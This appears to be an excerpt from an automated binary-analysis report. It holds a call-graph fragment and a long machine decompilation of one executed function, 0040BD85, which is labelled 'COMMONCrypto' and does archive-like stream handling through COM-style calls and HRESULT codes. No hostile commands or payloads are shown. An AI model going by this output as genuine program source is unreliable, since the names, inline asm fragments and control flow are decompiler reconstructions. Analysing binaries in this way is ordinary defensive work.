14290 40812e 14290->14283 14292 408157 __EH_prolog 14291->14292 14293 40891e 3 API calls 14292->14293 14294 408190 14293->14294 14295 40891e 3 API calls 14294->14295 14296 40819d 14295->14296 14296->14290

                                                                                                                            Executed Functions

                                                                                                                            Function 0040BD85 Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 864COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E0040BD85(intOrPtr __ecx, void* __eflags) {
				void* __edi;
				signed int _t457;
				signed int _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t477;
				signed int _t478;
				signed int _t484;
				signed int _t487;
				void* _t489;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				intOrPtr _t500;
				signed int _t502;
				signed int _t503;
				signed int _t507;
				signed int _t508;
				signed int _t514;
				signed int _t516;
				signed int _t518;
				signed int _t519;
				signed int _t528;
				signed int _t536;
				signed int* _t540;
				signed int _t545;
				void* _t548;
				signed int _t552;
				intOrPtr* _t558;
				signed int _t559;
				signed int _t560;
				signed int _t562;
				signed int _t563;
				signed char _t567;
				signed int _t569;
				signed int _t577;
				signed int _t579;
				signed int _t580;
				signed int _t586;
				signed int _t588;
				signed int _t589;
				signed int _t594;
				void* _t597;
				signed int _t608;
				signed int _t610;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				intOrPtr _t616;
				intOrPtr _t632;
				signed int _t636;
				intOrPtr* _t637;
				signed int _t644;
				signed int _t685;
				signed int _t694;
				signed int _t698;
				intOrPtr* _t699;
				signed int _t746;
				signed int _t747;
				intOrPtr* _t752;
				intOrPtr _t757;
				signed int _t759;
				intOrPtr _t760;
				signed int _t763;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t771;
				signed int _t772;
				char* _t774;
				signed int* _t775;
				char* _t776;
				signed int _t777;
				signed int _t778;
				intOrPtr _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr* _t787;
				intOrPtr _t788;
				void* _t789;
				void* _t790;
				void* _t795;

				_t795 = __eflags;
				E00418D80(E0041A180, _t790);
				_t610 =  *(_t790 + 0x14);
				_t771 =  *(_t790 + 0x18);
				 *( *(_t790 + 0x2c)) =  *( *(_t790 + 0x2c)) & 0x00000000;
				 *((intOrPtr*)(_t790 - 0x14)) = __ecx;
				_t763 = _t771 << 2;
				 *(_t790 - 0x2c) =  *((intOrPtr*)(_t610 + 8)) +  *(_t763 +  *((intOrPtr*)(_t610 + 0x30))) * 8;
				E0040CA12(_t790 - 0x4c);
				 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
				E0040F0A2(_t610, _t795, _t771, _t790 - 0x4c);
				 *(_t790 - 0x34) =  *( *((intOrPtr*)(_t610 + 0x34)) + _t771) & 0x000000ff;
				if( *(_t790 - 0x48) <= 0x20) {
					E0040BC96(_t790 - 0xc4);
					 *(_t790 - 4) = 1;
					E0040E83C(_t790 - 0x84);
					 *(_t790 - 4) = 2;
					E0040CB0A(_t790 - 0x4c, _t790 - 0xc4, __eflags);
					_t457 = E00407F05(_t790 - 0xc4, _t763, __eflags);
					__eflags = _t457;
					if(_t457 == 0) {
						L118:
						_t772 = 0x80004001;
						L172:
						_t437 = _t790 - 4;
						 *_t437 =  *(_t790 - 4) & 0x00000000;
						__eflags =  *_t437;
						E00403204(_t457,  *((intOrPtr*)(_t790 - 0x84)));
						E0040C85F(_t790 - 0xc4);
						goto L173;
					}
					_t462 =  *((intOrPtr*)(_t610 + 0x28));
					 *(_t790 + 0x17) = 1;
					_t746 = ( *( *((intOrPtr*)(_t610 + 0x34)) + _t771) & 0x000000ff) +  *(_t763 +  *((intOrPtr*)(_t610 + 0x2c)));
					__eflags =  *(_t790 + 0x1c);
					_t632 =  *((intOrPtr*)(_t462 + _t746 * 8));
					_t457 =  *(_t462 + 4 + _t746 * 8);
					if( *(_t790 + 0x1c) == 0) {
						L13:
						_t774 =  *((intOrPtr*)(_t790 - 0x14));
						__eflags =  *_t774;
						if( *_t774 == 0) {
							L15:
							_t463 =  *((intOrPtr*)(_t790 - 0x14));
							_t775 = _t463 + 0x5c;
							_t464 =  *(_t463 + 0x5c);
							__eflags = _t464;
							if(_t464 != 0) {
								 *((intOrPtr*)( *_t464 + 8))(_t464);
								 *_t775 =  *_t775 & 0x00000000;
								__eflags =  *_t775;
							}
							_push(0x84);
							_t465 = E004031DD();
							 *(_t790 + 0x18) = _t465;
							__eflags = _t465;
							 *(_t790 - 4) = 3;
							if(__eflags == 0) {
								_t466 = 0;
								__eflags = 0;
							} else {
								_t466 = E0040C88E(_t465, __eflags, 0);
							}
							 *(_t790 - 4) = 2;
							 *( *((intOrPtr*)(_t790 - 0x14)) + 0x54) = _t466;
							E004063E5(_t775, _t466);
							_t636 =  *( *((intOrPtr*)(_t790 - 0x14)) + 0x54);
							__eflags = _t636;
							if(_t636 == 0) {
								_t637 = 0;
								__eflags = 0;
							} else {
								_t637 = _t636 + 4;
							}
							_t776 =  *((intOrPtr*)(_t790 - 0x14));
							_t747 = _t790 - 0xc4;
							 *((intOrPtr*)(_t776 + 0x58)) = _t637;
							_t457 =  *((intOrPtr*)( *_t637))(_t747);
							__eflags = _t457;
							if(_t457 == 0) {
								__eflags =  *(_t790 - 0x48);
								 *(_t790 - 0x18) = 0;
								if(__eflags <= 0) {
									L35:
									E00408339(_t776 + 4, __eflags, _t790 - 0xc4);
									E0040CE11(_t776 + 0x44, _t790 - 0x84);
									 *_t776 = 1;
									_t774 =  *((intOrPtr*)(_t790 - 0x14));
									L36:
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t774 + 0x58)))) + 0x10))();
									 *(_t790 + 0x1b) =  *(_t790 + 0x1b) & 0;
									__eflags =  *(_t790 - 0x48);
									_t477 =  *(_t763 +  *((intOrPtr*)(_t610 + 0x2c)));
									 *((intOrPtr*)(_t790 - 0x30)) = 0;
									 *(_t790 - 0x78) = _t477;
									 *((intOrPtr*)(_t790 - 0x1c)) = 0;
									if( *(_t790 - 0x48) <= 0) {
										L100:
										_t777 =  *(_t790 - 0x2c);
										__eflags =  *(_t790 + 0x20);
										if( *(_t790 + 0x20) != 0) {
											__eflags =  *(_t790 + 0x17);
											_t268 =  *(_t790 + 0x17) == 0;
											__eflags = _t268;
											 *((intOrPtr*)( *( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58)) + 0xc))(_t747 & 0xffffff00 | _t268);
										}
										 *((intOrPtr*)(_t790 - 0x70)) = 0;
										 *(_t790 - 0x6c) = 0;
										 *((intOrPtr*)(_t790 - 0x68)) = 0;
										_push(0x30);
										 *(_t790 - 4) = 0xf;
										_t478 = E004031DD();
										 *(_t790 + 0x30) = _t478;
										__eflags = _t478;
										 *(_t790 - 4) = 0x10;
										if(_t478 == 0) {
											_t765 = 0;
											__eflags = 0;
										} else {
											_t765 = E0040CD3D(_t478);
										}
										__eflags = _t765;
										 *(_t790 + 0x30) = _t765;
										 *(_t790 - 4) = 0xf;
										 *(_t790 + 0x34) = _t765;
										if(_t765 != 0) {
											 *((intOrPtr*)( *_t765 + 4))(_t765);
										}
										__eflags =  *(_t790 - 0x38) - 1;
										_t613 =  *(_t790 + 8);
										 *(_t790 - 4) = 0x11;
										if( *(_t790 - 0x38) <= 1) {
											L128:
											 *(_t790 + 0x18) =  *(_t790 + 0x18) & 0x00000000;
											__eflags =  *(_t790 - 0x38);
											if( *(_t790 - 0x38) <= 0) {
												L144:
												_t479 =  *(_t790 - 0x6c);
												_t778 = 0;
												__eflags = _t479;
												_t614 = _t479;
												 *(_t790 + 0x1c) = 0;
												if(_t479 != 0) {
													__eflags = _t479 - 0x3fffffff;
													if(_t479 > 0x3fffffff) {
														_t479 = 0x3fffffff;
													}
													_t502 = _t479 << 2;
													__eflags = _t502;
													_push(_t502);
													_t778 = E004031DD();
													 *(_t790 + 0x1c) = _t778;
												}
												_t644 = 0;
												__eflags = _t614;
												if(_t614 <= 0) {
													L150:
													__eflags =  *(_t790 + 0x20);
													if( *(_t790 + 0x20) == 0) {
														E00403204(_t479, _t778);
														__eflags = _t765;
														 *(_t790 - 4) = 0xf;
														if(_t765 != 0) {
															 *((intOrPtr*)( *_t765 + 8))(_t765);
														}
														_t772 = 0x80004005;
														goto L171;
													}
													 *(_t790 + 0x30) = 0;
													__eflags =  *(_t790 + 0x24);
													 *(_t790 - 4) = 0x14;
													if( *(_t790 + 0x24) != 0) {
														_push(( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58))[0x18]);
														_t496 = E004080CE( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58));
														__eflags = _t496;
														if(_t496 == 0) {
															_push(0xc);
															_t497 = E004031DD();
															 *(_t790 + 0x14) = _t497;
															__eflags = _t497;
															 *(_t790 - 4) = 0x15;
															if(_t497 == 0) {
																_t498 = 0;
																__eflags = 0;
															} else {
																_push( *(_t790 + 0x24));
																_t498 = E0040CA28(_t497);
															}
															 *(_t790 - 4) = 0x14;
															E004063E5(_t790 + 0x30, _t498);
														}
													}
													 *(_t790 + 8) =  *(_t790 + 0x20);
													_t484 =  *(_t790 + 0x30);
													__eflags = _t484;
													if(_t484 == 0) {
														_t484 =  *(_t790 + 0x24);
													}
													_t615 =  *((intOrPtr*)( *( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58)) + 0x18))(_t778, _t790 + 8, _t484,  *(_t790 + 0x2c));
													_t487 =  *(_t790 + 0x30);
													__eflags = _t487;
													 *(_t790 - 4) = 0x13;
													if(_t487 != 0) {
														_t487 =  *((intOrPtr*)( *_t487 + 8))(_t487);
													}
													E00403204(_t487, _t778);
													__eflags = _t765;
													 *(_t790 - 4) = 0xf;
													if(_t765 != 0) {
														 *((intOrPtr*)( *_t765 + 8))(_t765);
													}
													 *(_t790 - 4) = 2;
													_t489 = E0040CE6F(_t790 - 0x70, _t765);
													 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
													E00403204(_t489,  *((intOrPtr*)(_t790 - 0x84)));
													E0040C85F(_t790 - 0xc4);
													 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
													E0040CDED(_t790 - 0x4c);
													_t461 = _t615;
													goto L174;
												} else {
													do {
														_t500 =  *((intOrPtr*)(_t790 - 0x70));
														_t479 =  *( *(_t500 + _t644 * 4));
														 *(_t778 + _t644 * 4) =  *( *(_t500 + _t644 * 4));
														_t644 = _t644 + 1;
														__eflags = _t644 - _t614;
													} while (_t644 < _t614);
													goto L150;
												}
											}
											_t765 = _t777;
											do {
												 *(_t790 + 0x1c) =  *(_t790 + 0x1c) & 0x00000000;
												_t616 =  *((intOrPtr*)(_t765 + 4));
												_t780 =  *_t765 +  *((intOrPtr*)(_t790 + 0xc));
												 *(_t790 - 4) = 0x12;
												asm("adc ebx, [ebp+0x10]");
												__eflags =  *(_t790 - 0x38) - 1;
												if( *(_t790 - 0x38) != 1) {
													_push(0x20);
													_t503 = E004031DD();
													__eflags = _t503;
													if(_t503 == 0) {
														_t350 = _t790 + 0x14;
														 *_t350 =  *(_t790 + 0x14) & 0x00000000;
														__eflags =  *_t350;
													} else {
														 *(_t503 + 4) =  *(_t503 + 4) & 0x00000000;
														 *(_t503 + 0x18) =  *(_t503 + 0x18) & 0x00000000;
														 *_t503 = 0x41bbfc;
														 *(_t790 + 0x14) = _t503;
													}
													E004063E5(_t790 + 0x1c,  *(_t790 + 0x14));
													_t356 =  *(_t790 + 0x14) + 0x18; // 0x18
													E004063E5(_t356,  *(_t790 + 0x30));
													_t507 =  *(_t790 + 0x14);
													 *((intOrPtr*)(_t507 + 0x10)) = _t780;
													 *(_t507 + 8) =  *(_t790 + 0x30);
													 *((intOrPtr*)(_t507 + 0x14)) = _t616;
													goto L137;
												}
												_t516 =  *(_t790 + 8);
												_t772 =  *((intOrPtr*)( *_t516 + 0x10))(_t516, _t780, _t616, 0, 0);
												__eflags = _t772;
												if(_t772 != 0) {
													_t518 =  *(_t790 + 0x1c);
													 *(_t790 - 4) = 0x11;
													__eflags = _t518;
													if(_t518 != 0) {
														 *((intOrPtr*)( *_t518 + 8))(_t518);
													}
													_t519 =  *(_t790 + 0x30);
													 *(_t790 - 4) = 0xf;
													__eflags = _t519;
													if(_t519 != 0) {
														 *((intOrPtr*)( *_t519 + 8))(_t519);
													}
													goto L171;
												}
												E004063E5(_t790 + 0x1c,  *(_t790 + 8));
												L137:
												_push(0x28);
												_t508 = E004031DD();
												__eflags = _t508;
												if(_t508 == 0) {
													_t781 = 0;
													__eflags = 0;
												} else {
													 *((intOrPtr*)(_t508 + 4)) = 0;
													 *((intOrPtr*)(_t508 + 8)) = 0;
													 *_t508 = 0x41bbec;
													_t781 = _t508;
												}
												E004063E5(E0040895D(_t790 - 0x70), _t781);
												_t366 = _t781 + 8; // 0x8
												E004063E5(_t366,  *(_t790 + 0x1c));
												 *(_t790 - 4) = 0x11;
												asm("sbb ecx, [edi+0x4]");
												 *(_t781 + 0x20) =  *(_t781 + 0x20) & 0x00000000;
												 *((intOrPtr*)(_t781 + 0x10)) =  *(_t765 + 8) -  *_t765;
												 *((intOrPtr*)(_t781 + 0x18)) = 0;
												 *((intOrPtr*)(_t781 + 0x14)) =  *((intOrPtr*)(_t765 + 0xc));
												 *((intOrPtr*)(_t781 + 0x1c)) = 0;
												_t514 =  *(_t790 + 0x1c);
												__eflags = _t514;
												if(_t514 != 0) {
													 *((intOrPtr*)( *_t514 + 8))(_t514);
												}
												 *(_t790 + 0x18) =  *(_t790 + 0x18) + 1;
												_t765 = _t765 + 8;
												__eflags =  *(_t790 + 0x18) -  *(_t790 - 0x38);
											} while ( *(_t790 + 0x18) <  *(_t790 - 0x38));
											_t765 =  *(_t790 + 0x30);
											goto L144;
										} else {
											asm("adc edx, [ebp+0x10]");
											_t765 =  *((intOrPtr*)( *_t613 + 0x10))(_t613,  *_t777 +  *((intOrPtr*)(_t790 + 0xc)),  *((intOrPtr*)(_t777 + 4)), 0,  *(_t790 + 0x30) + 0x10);
											__eflags = _t765;
											if(_t765 == 0) {
												E004063E5( *(_t790 + 0x30) + 8, _t613);
												_t765 =  *(_t790 + 0x30);
												goto L128;
											}
											_t528 =  *(_t790 + 0x30);
											 *(_t790 - 4) = 0xf;
											__eflags = _t528;
											if(_t528 != 0) {
												 *((intOrPtr*)( *_t528 + 8))(_t528);
											}
											_t772 = _t765;
											L171:
											 *(_t790 - 4) = 2;
											_t457 = E0040CE6F(_t790 - 0x70, _t765);
											goto L172;
										}
									}
									_t536 = _t477 << 3;
									__eflags = _t536;
									 *((intOrPtr*)(_t790 - 0x54)) = 0;
									 *(_t790 - 0x50) = _t536;
									do {
										_t782 =  *((intOrPtr*)(_t790 - 0x54)) +  *((intOrPtr*)(_t790 - 0x4c));
										 *(_t790 - 0x24) = _t782;
										_t540 =  *((intOrPtr*)( *( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58)) + 8))( *((intOrPtr*)(_t790 - 0x1c)));
										_t685 =  *_t540;
										__eflags = _t685;
										_t766 = _t685;
										if(_t685 == 0) {
											_t766 = _t540[1];
										}
										__eflags =  *(_t790 + 0x1b);
										if( *(_t790 + 0x1b) != 0) {
											L52:
											 *(_t790 - 0x10) =  *(_t790 - 0x10) & 0x00000000;
											 *(_t790 - 4) = 0xb;
											 *((intOrPtr*)( *_t766))(_t766, 0x41b300, _t790 - 0x10);
											_t457 =  *(_t790 - 0x10);
											__eflags = _t457;
											if(_t457 == 0) {
												L58:
												__eflags = _t457;
												 *(_t790 - 4) = 2;
												if(_t457 != 0) {
													 *((intOrPtr*)( *_t457 + 8))(_t457);
												}
												 *(_t790 - 0x74) =  *(_t790 - 0x74) & 0x00000000;
												 *(_t790 - 0x10) =  *(_t790 - 0x10) & 0x00000000;
												 *(_t790 - 4) = 0xc;
												 *((intOrPtr*)( *_t766))(_t766, 0x41b2d0, _t790 - 0x10);
												_t767 =  *(_t790 - 0x10);
												__eflags = _t767;
												if(_t767 == 0) {
													L63:
													__eflags = _t767;
													 *(_t790 - 4) = 2;
													if(_t767 != 0) {
														 *((intOrPtr*)( *_t767 + 8))(_t767);
													}
													_t783 =  *(_t782 + 0x10);
													 *(_t790 - 0x18) =  *(_t790 - 0x18) & 0x00000000;
													__eflags = _t783;
													 *(_t790 - 0x28) = _t783;
													if(_t783 != 0) {
														_t562 = 0x1fffffff;
														__eflags = _t783 - 0x1fffffff;
														if(_t783 <= 0x1fffffff) {
															_t562 = _t783;
														}
														_t563 = _t562 << 3;
														__eflags = _t563;
														_push(_t563);
														 *(_t790 - 0x18) = E004031DD();
													}
													 *(_t790 - 0x20) =  *(_t790 - 0x20) & 0x00000000;
													 *(_t790 - 4) = 0xd;
													__eflags = _t783;
													if(_t783 != 0) {
														_t559 = 0x3fffffff;
														__eflags = _t783 - 0x3fffffff;
														if(_t783 <= 0x3fffffff) {
															_t559 = _t783;
														}
														_t560 = _t559 << 2;
														__eflags = _t560;
														_push(_t560);
														 *(_t790 - 0x20) = E004031DD();
													}
													 *(_t790 - 0x24) =  *(_t790 - 0x24) & 0x00000000;
													 *(_t790 - 4) = 0xe;
													__eflags = _t783;
													if(_t783 <= 0) {
														L96:
														_t545 =  *(_t790 + 0x1c);
														__eflags = _t545;
														if(_t545 == 0) {
															L98:
															_t545 =  *((intOrPtr*)(_t610 + 0x28)) +  *(_t790 - 0x50);
															__eflags = _t545;
															goto L99;
														}
														__eflags =  *((intOrPtr*)(_t790 - 0x1c)) -  *((intOrPtr*)(_t790 - 0xa0));
														if( *((intOrPtr*)(_t790 - 0x1c)) ==  *((intOrPtr*)(_t790 - 0xa0))) {
															goto L99;
														}
														goto L98;
													} else {
														_t768 =  *(_t790 - 0x18);
														_t784 =  *(_t790 - 0x2c);
														 *(_t790 - 0x10) =  *(_t790 - 0x20);
														do {
															_t752 =  *((intOrPtr*)(_t790 - 0x44));
															_t694 = 0;
															__eflags =  *(_t790 - 0x40);
															if( *(_t790 - 0x40) <= 0) {
																L85:
																_t694 = _t694 | 0xffffffff;
																__eflags = _t694;
																L86:
																__eflags = _t694;
																if(_t694 < 0) {
																	_t552 = 0;
																	__eflags =  *(_t790 - 0x38);
																	if( *(_t790 - 0x38) <= 0) {
																		L92:
																		_t552 = _t552 | 0xffffffff;
																		__eflags = _t552;
																		L93:
																		__eflags = _t552;
																		if(_t552 < 0) {
																			_t457 = E00403204(E00403204(_t552,  *(_t790 - 0x20)),  *(_t790 - 0x18));
																			goto L118;
																		}
																		_t698 =  *((intOrPtr*)(_t784 + 8 + _t552 * 8)) -  *((intOrPtr*)(_t784 + _t552 * 8));
																		__eflags = _t698;
																		asm("sbb edx, [esi+eax*8+0x4]");
																		 *_t768 = _t698;
																		 *((intOrPtr*)(_t768 + 4)) =  *((intOrPtr*)(_t784 + 0xc + _t552 * 8));
																		 *( *(_t790 - 0x10)) = _t768;
																		goto L95;
																	}
																	_t699 =  *((intOrPtr*)(_t790 - 0x3c));
																	while(1) {
																		__eflags =  *_t699 -  *((intOrPtr*)(_t790 - 0x30));
																		if( *_t699 ==  *((intOrPtr*)(_t790 - 0x30))) {
																			goto L93;
																		}
																		_t552 = _t552 + 1;
																		_t699 = _t699 + 4;
																		__eflags = _t552 -  *(_t790 - 0x38);
																		if(_t552 <  *(_t790 - 0x38)) {
																			continue;
																		}
																		goto L92;
																	}
																	goto L93;
																}
																 *( *(_t790 - 0x10)) =  *((intOrPtr*)(_t610 + 0x28)) + ( *((intOrPtr*)(_t752 + 4 + _t694 * 8)) +  *(_t790 - 0x78)) * 8;
																goto L95;
															}
															_t558 = _t752;
															while(1) {
																__eflags =  *_t558 -  *((intOrPtr*)(_t790 - 0x30));
																if( *_t558 ==  *((intOrPtr*)(_t790 - 0x30))) {
																	break;
																}
																_t694 = _t694 + 1;
																_t558 = _t558 + 8;
																__eflags = _t694 -  *(_t790 - 0x40);
																if(_t694 <  *(_t790 - 0x40)) {
																	continue;
																}
																_t784 =  *(_t790 - 0x2c);
																goto L85;
															}
															_t784 =  *(_t790 - 0x2c);
															goto L86;
															L95:
															 *(_t790 - 0x24) =  *(_t790 - 0x24) + 1;
															 *(_t790 - 0x10) =  *(_t790 - 0x10) + 4;
															_t768 = _t768 + 8;
															 *((intOrPtr*)(_t790 - 0x30)) =  *((intOrPtr*)(_t790 - 0x30)) + 1;
															__eflags =  *(_t790 - 0x24) -  *(_t790 - 0x28);
														} while ( *(_t790 - 0x24) <  *(_t790 - 0x28));
														goto L96;
													}
												} else {
													_t567 =  *(_t790 + 0x17);
													 *(_t790 - 0x74) = _t567;
													__eflags = _t567;
													_t769 =  *((intOrPtr*)( *_t767 + 0xc))(_t767, 0 | _t567 != 0x00000000);
													__eflags = _t769;
													if(_t769 != 0) {
														_t569 =  *(_t790 - 0x10);
														 *(_t790 - 4) = 2;
														__eflags = _t569;
														if(_t569 != 0) {
															_t569 =  *((intOrPtr*)( *_t569 + 8))(_t569);
														}
														 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
														E00403204(_t569,  *((intOrPtr*)(_t790 - 0x84)));
														E0040C85F(_t790 - 0xc4);
														 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
														E0040CDED(_t790 - 0x4c);
														_t461 = _t769;
														goto L174;
													}
													_t767 =  *(_t790 - 0x10);
													goto L63;
												}
											}
											_t757 =  *((intOrPtr*)(_t782 + 0xc));
											__eflags = _t757 - 0xffffffff;
											if(_t757 > 0xffffffff) {
												__eflags = _t457;
												 *(_t790 - 4) = 2;
												if(_t457 != 0) {
													_t457 =  *((intOrPtr*)( *_t457 + 8))(_t457);
												}
												goto L118;
											}
											_t772 =  *((intOrPtr*)( *_t457 + 0xc))(_t457,  *((intOrPtr*)(_t782 + 8)), _t757);
											__eflags = _t772 - 0x80070057;
											if(_t772 == 0x80070057) {
												_t772 = 0x80004001;
											}
											__eflags = _t772;
											if(_t772 != 0) {
												_t457 =  *(_t790 - 0x10);
												 *(_t790 - 4) = 2;
												__eflags = _t457;
												if(_t457 != 0) {
													_t457 =  *((intOrPtr*)( *_t457 + 8))(_t457);
												}
												goto L172;
											} else {
												_t457 =  *(_t790 - 0x10);
												_t782 =  *(_t790 - 0x24);
												goto L58;
											}
										} else {
											__eflags =  *(_t790 + 0x30);
											if( *(_t790 + 0x30) == 0) {
												L47:
												 *(_t790 - 0x10) =  *(_t790 - 0x10) & 0x00000000;
												 *(_t790 - 4) = 0xa;
												 *((intOrPtr*)( *_t766))(_t766, 0x41b2b0, _t790 - 0x10);
												_t577 =  *(_t790 - 0x10);
												__eflags = _t577;
												if(_t577 == 0) {
													L50:
													__eflags = _t577;
													 *(_t790 - 4) = 2;
													if(_t577 != 0) {
														 *((intOrPtr*)( *_t577 + 8))(_t577);
													}
													goto L52;
												}
												 *(_t790 + 0x1b) = 1;
												_t579 =  *((intOrPtr*)( *_t577 + 0xc))(_t577,  *((intOrPtr*)(_t790 + 0x38)),  *((intOrPtr*)(_t790 + 0x3c)));
												__eflags = _t579;
												 *(_t790 - 0x28) = _t579;
												if(_t579 != 0) {
													_t580 =  *(_t790 - 0x10);
													 *(_t790 - 4) = 2;
													__eflags = _t580;
													if(_t580 != 0) {
														_t580 =  *((intOrPtr*)( *_t580 + 8))(_t580);
													}
													 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
													E00403204(_t580,  *((intOrPtr*)(_t790 - 0x84)));
													E0040C85F(_t790 - 0xc4);
													 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
													E0040CDED(_t790 - 0x4c);
													_t461 =  *(_t790 - 0x28);
													goto L174;
												}
												_t577 =  *(_t790 - 0x10);
												goto L50;
											}
											 *(_t790 - 0x10) =  *(_t790 - 0x10) & 0x00000000;
											 *(_t790 - 4) = 9;
											 *((intOrPtr*)( *_t766))(_t766, 0x41b2e0, _t790 - 0x10);
											_t586 =  *(_t790 - 0x10);
											__eflags = _t586;
											if(_t586 == 0) {
												L45:
												__eflags = _t586;
												 *(_t790 - 4) = 2;
												if(_t586 != 0) {
													 *((intOrPtr*)( *_t586 + 8))(_t586);
												}
												goto L47;
											}
											 *(_t790 + 0x1b) = 1;
											_t588 =  *((intOrPtr*)( *_t586 + 0xc))(_t586,  *(_t790 + 0x34));
											__eflags = _t588;
											 *(_t790 - 0x28) = _t588;
											if(_t588 != 0) {
												_t589 =  *(_t790 - 0x10);
												 *(_t790 - 4) = 2;
												__eflags = _t589;
												if(_t589 != 0) {
													_t589 =  *((intOrPtr*)( *_t589 + 8))(_t589);
												}
												 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
												E00403204(_t589,  *((intOrPtr*)(_t790 - 0x84)));
												E0040C85F(_t790 - 0xc4);
												 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
												E0040CDED(_t790 - 0x4c);
												_t461 =  *(_t790 - 0x28);
												goto L174;
											}
											_t586 =  *(_t790 - 0x10);
											goto L45;
										}
										L99:
										_t747 =  *( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58));
										_t548 = E00403204( *((intOrPtr*)(_t747 + 0x14))( *((intOrPtr*)(_t790 - 0x1c)), _t545,  *(_t790 - 0x20),  *(_t790 - 0x74)),  *(_t790 - 0x20));
										 *(_t790 - 4) = 2;
										E00403204(_t548,  *(_t790 - 0x18));
										 *((intOrPtr*)(_t790 - 0x1c)) =  *((intOrPtr*)(_t790 - 0x1c)) + 1;
										 *(_t790 - 0x50) =  *(_t790 - 0x50) + 8;
										 *((intOrPtr*)(_t790 - 0x54)) =  *((intOrPtr*)(_t790 - 0x54)) + 0x18;
										__eflags =  *((intOrPtr*)(_t790 - 0x1c)) -  *(_t790 - 0x48);
									} while ( *((intOrPtr*)(_t790 - 0x1c)) <  *(_t790 - 0x48));
									goto L100;
								}
								 *(_t790 + 0x18) = 0;
								while(1) {
									 *(_t790 - 0x64) =  *(_t790 - 0x64) & 0x00000000;
									 *(_t790 - 0x60) =  *(_t790 - 0x60) & 0x00000000;
									_t787 =  *(_t790 + 0x18) +  *((intOrPtr*)(_t790 - 0x4c));
									_push( *((intOrPtr*)(_t787 + 4)));
									 *(_t790 - 4) = 4;
									_push( *_t787);
									_t594 = E00406310(0, _t790 - 0x64, __eflags);
									__eflags = _t594;
									if(_t594 != 0) {
										break;
									}
									_t788 =  *((intOrPtr*)(_t787 + 0x10));
									__eflags = _t788 - 1;
									if(_t788 != 1) {
										__eflags =  *(_t790 - 0x60);
										if( *(_t790 - 0x60) == 0) {
											L83:
											 *(_t790 - 4) = 7;
											E0040B44C(_t790 - 0x60);
											 *(_t790 - 4) = 2;
											_t597 = E0040B44C(_t790 - 0x64);
											 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
											E00403204(_t597,  *((intOrPtr*)(_t790 - 0x84)));
											E0040C85F(_t790 - 0xc4);
											 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
											E0040CDED(_t790 - 0x4c);
											_t461 = 0x80004001;
											goto L174;
										}
										__eflags =  *((intOrPtr*)(_t790 - 0x58)) - _t788;
										if( *((intOrPtr*)(_t790 - 0x58)) != _t788) {
											goto L83;
										}
										L33:
										_t747 = _t790 - 0x64;
										 *((intOrPtr*)( *( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58)) + 4))(_t747);
										 *(_t790 - 4) = 8;
										E0040B44C(_t790 - 0x60);
										 *(_t790 - 4) = 2;
										E0040B44C(_t790 - 0x64);
										 *(_t790 - 0x18) =  *(_t790 - 0x18) + 1;
										 *(_t790 + 0x18) =  *(_t790 + 0x18) + 0x18;
										__eflags =  *(_t790 - 0x18) -  *(_t790 - 0x48);
										if(__eflags < 0) {
											continue;
										}
										_t776 =  *((intOrPtr*)(_t790 - 0x14));
										goto L35;
									}
									__eflags =  *(_t790 - 0x64) - _t594;
									if( *(_t790 - 0x64) == _t594) {
										 *(_t790 - 4) = 6;
										_t772 = 0x80004001;
										L82:
										E0040B44C(_t790 - 0x60);
										 *(_t790 - 4) = 2;
										_t457 = E0040B44C(_t790 - 0x64);
										goto L172;
									}
									goto L33;
								}
								 *(_t790 - 4) = 5;
								_t772 = _t594;
								goto L82;
							} else {
								_t772 = _t457;
								goto L172;
							}
						}
						_t747 = _t774 + 4;
						_t608 = E0040CBF8(_t790 - 0xc4, _t747);
						__eflags = _t608;
						if(_t608 != 0) {
							goto L36;
						}
						goto L15;
					}
					_t759 =  *(_t790 + 0x1c);
					_t789 =  *_t759;
					_t760 =  *((intOrPtr*)(_t759 + 4));
					__eflags = _t760 - _t457;
					if(__eflags < 0) {
						__eflags = _t789 - _t632;
						L9:
						if(__eflags != 0) {
							L12:
							_t41 = _t790 + 0x17;
							 *_t41 =  *(_t790 + 0x17) & 0x00000000;
							__eflags =  *_t41;
							goto L13;
						}
						__eflags = _t760 - _t457;
						if(_t760 != _t457) {
							goto L12;
						} else {
							 *(_t790 + 0x17) = 1;
							goto L13;
						}
					}
					if(__eflags > 0) {
						L7:
						_t772 = 0x80004005;
						goto L172;
					}
					__eflags = _t789 - _t632;
					if(__eflags <= 0) {
						goto L9;
					}
					goto L7;
				} else {
					_t772 = 0x80004001;
					L173:
					 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
					E0040CDED(_t790 - 0x4c);
					_t461 = _t772;
					L174:
					 *[fs:0x0] =  *((intOrPtr*)(_t790 - 0xc));
					return _t461;
				}
			}




























































































                                                                                                                            0x0040bd85
                                                                                                                            0x0040bd8a
                                                                                                                            0x0040bd99
                                                                                                                            0x0040bd9d
                                                                                                                            0x0040bda0
                                                                                                                            0x0040bda7
                                                                                                                            0x0040bdaf
                                                                                                                            0x0040bdbb
